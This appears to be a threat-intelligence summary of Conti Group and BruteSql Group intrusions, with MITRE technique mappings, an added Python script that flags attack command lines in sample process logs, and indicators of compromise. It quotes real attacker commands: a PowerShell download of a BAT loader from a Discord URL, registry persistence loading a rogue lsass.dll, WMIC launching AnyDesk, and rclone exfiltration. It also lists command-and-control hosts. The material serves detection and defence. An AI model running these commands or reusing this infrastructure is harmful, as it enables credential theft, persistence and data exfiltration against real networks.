Conti Group, a globally renowned ransomware operation, has recently targeted high-value sectors by exploiting Exchange vulnerabilities to launch targeted campaigns against affluent firms. The report also covers BruteSql Group and links to Conti activity, including Cobalt Strike payloads and remote-control tools like AnyDesk.
#ContiGroup #BruteSqlGroup
Keypoints
- Conti Group has been actively conducting targeted attacks against wealthy industries (risk investment firms, luxury brands, chip manufacturing, foreign joint ventures) using Exchange vulnerabilities.
- Inside Conti Group, the organization reportedly comprises over 400 personnel with specialized roles, indicating a structured operation.
- The group deploys a credential dumper (lsass.dll) to harvest system credentials and dumps memory (MiniDump) for credential access.
- Persistence is achieved through Windows service manipulation: registry entries for a service's NetworkProvider are altered to point ProviderPath at the malicious lsass.dll, so the backdoor is loaded by a trusted system process.
- Lateral movement and remote control are achieved via WMIC/WinRS and AnyDesk, enabling internal network roaming and remote access.
- Data exfiltration often uses cloud tools like rclone to copy sensitive data out of the network, sometimes via public download/command chains.
- BruteSql Group, a related Russian-speaking actor set, employs SQL brute-forcing and N-day exploits to implant Cobalt Strike backdoors and deploy AnyDesk for remote control, with connections to Conti activity.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Conti Group used an Exchange vulnerability to connect to target machines and establish a tunnel. “Conti Group established a tunnel to target machines via an Exchange vulnerability.”
- [T1003.001] OS Credential Dumping – The lsass.dll dropper steals credentials and stores them to a local file. “The sample’s main function stores system credentials to c:\Windows\tmp\QWER.tmp.”
- [T1543.003] Create or Modify Windows Service – Registry modification to load lsass.dll as a service. “reg.exe add ‘HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider’ /v ‘ProviderPath’ …”
- [T1059.003] Command-Line – Use of cmd.exe to execute commands during the intrusion. “cmd.exe /c !uplaod D:\Uchebka\work\SOFT\LSASS\lsass.dll -dest C:\Windows\system32\lsass.dll”
- [T1059.001] PowerShell – PowerShell commands are used to download and execute payloads. “powershell /c powershell.exe Invoke-WebRequest -URI …”
- [T1105] Ingress Tool Transfer – Downloading and executing payloads via Invoke-WebRequest to drop BAT/CS loaders. “powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat -outfile 7.bat”
- [T1047] Windows Management Instrumentation – WMIC command usage to spawn processes on remote hosts. “WMIC process call create “c:\programdata\AnyDesk.exe --get-id””
- [T1021.001] Remote Services – Use of AnyDesk for remote control to move laterally within networks. “Delivered the AnyDesk remote-control program.”
- [T1567.002] Exfiltration to Cloud Storage – Data exfiltration using rclone to cloud storage. “rclone copy --max-age 3y …”
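The command lines quoted above are distinctive enough to hunt for in process-creation telemetry. The following triage script is an added example, not code from the report or from Conti tooling: it runs four pattern rules (reg.exe NetworkProvider/ProviderPath, Invoke-WebRequest fetching a BAT, WMIC launching AnyDesk, rclone copy with --max-age) over constructed sample events and escalates hosts where more than one technique appears, since the chain matters more than any single hit. Host names and the sample events are constructed; the service name `logincontroll` and the Discord CDN URL come from the report.

```python
import re

# Constructed sample process-creation records (host names and the file-server
# paths are invented; the command patterns follow the report's quoted commands).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": r'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider" /v ProviderPath /d C:\Windows\system32\lsass.dll'},
    {"host": "ws01", "cmdline": "powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat -outfile 7.bat"},
    {"host": "ws01", "cmdline": r'WMIC process call create "c:\programdata\AnyDesk.exe --get-id"'},
    {"host": "fs02", "cmdline": r"rclone copy --max-age 3y D:\Finance mega:dump"},
    {"host": "ws03", "cmdline": "svchost.exe -k netsvcs"},  # benign control event
]

# (technique id, description, pattern) keyed to the MITRE techniques listed above.
RULES = [
    ("T1543.003", "reg.exe sets a NetworkProvider ProviderPath (service-loaded DLL persistence)",
     re.compile(r"\breg(\.exe)?\s+add\s+.*\\NetworkProvider\b.*ProviderPath", re.I)),
    ("T1105", "Invoke-WebRequest pulls a BAT/EXE/DLL from a remote URL",
     re.compile(r"invoke-webrequest.*-uri\s+\S+\.(bat|exe|dll)\b", re.I)),
    ("T1047", "WMIC process call create launching AnyDesk",
     re.compile(r"\bwmic\b.*process\s+call\s+create.*anydesk", re.I)),
    ("T1567.002", "rclone copy with --max-age (bulk collection for exfiltration)",
     re.compile(r"\brclone\s+copy\b.*--max-age", re.I)),
]


def match_event(cmdline):
    """Return the (technique id, description) pairs whose pattern fires on one command line."""
    return [(tid, desc) for tid, desc, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Group hits per host: {host: sorted list of distinct technique ids}."""
    hits = {}
    for ev in events:
        for tid, _ in match_event(ev["cmdline"]):
            hits.setdefault(ev["host"], set()).add(tid)
    return {host: sorted(tids) for host, tids in hits.items()}


def escalate(hits, threshold=2):
    """Hosts showing at least `threshold` distinct techniques warrant incident response."""
    return sorted(host for host, tids in hits.items() if len(tids) >= threshold)


if __name__ == "__main__":
    per_host = triage(SAMPLE_EVENTS)
    for host, tids in sorted(per_host.items()):
        print(f"{host}: {', '.join(tids)}")
    print("escalate:", escalate(per_host))
```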
Indicators of Compromise
- [MD5] Conti Group samples – 0838b1a1618c5ea3137ece85f83686c0, c914661e98b35630a9abc356f4b24c58, and 15 more hashes
- [Domain] Command-and-control domains – rewujisaf.com, fuvataren.com, xenilik.com, kusayeyixa.com, wudimomo.com
- [URL] Delivery/loader URLs – https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat, https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat, http://91.213.50.102:80/avadacedavra
- [IP] Command-and-control/Upload endpoints – 37.252.11.18 (Poland Mega login), 92.255.85.138:8991
- [File Name] Dropped/loaded payloads – lsass.dll, AnyDesk.exe
Read more: https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g